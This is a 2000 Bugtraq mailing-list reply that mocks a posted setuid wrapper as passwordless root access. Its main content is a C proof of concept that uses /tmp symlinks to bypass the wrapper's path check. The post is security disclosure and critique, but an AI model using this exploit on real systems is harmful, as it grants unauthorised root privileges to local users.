[16774] in bugtraq
Re: Format String Attacks
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Thu Sep 14 18:13:21 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <20000913231217.5AE.0@argo.troja.mff.cuni.cz>
Date: Wed, 13 Sep 2000 23:36:40 +0200
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200009131509.KAA09328@galen.eng.auburn.edu>
On Wed, 13 Sep 2000, Doug Hughes wrote:
> Since I don't recall anybody else posting one, here is a simple, generic,
> setuid wrapper that people could use around, for instance, /usr/bin/eject
> or other setuid programs.
<ironic>
Thank you for a nice implementation of sudo that does not bother asking
for a password. Instant root for any user...very nice. But wait! It is not
complete. Here is the missing piece:
#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <limits.h>
int
main(int argc, char **argv, char **envp)
{
char oldpath[MAXPATHLEN];
char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)];
++argv;
srandom(getpid() + 5*time());
if (argc < 2)
{ fprintf(stderr, "missing argument\n"); return 1; }
if (realpath(argv[0], oldpath) == NULL)
{ fprintf(stderr, "realpath failed\n"); return 1; }
sprintf(newpath, "/tmp/%ld.orig", random());
if (symlink(oldpath, newpath) == -1)
{ perror("symlink"); return 1; }
strrchr(newpath, '.')[0] = '\0';
argv[0] = newpath;
execve("path-to-your-wrapper", argv, envp);
perror("execve"); return 1;
}
</ironic>
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
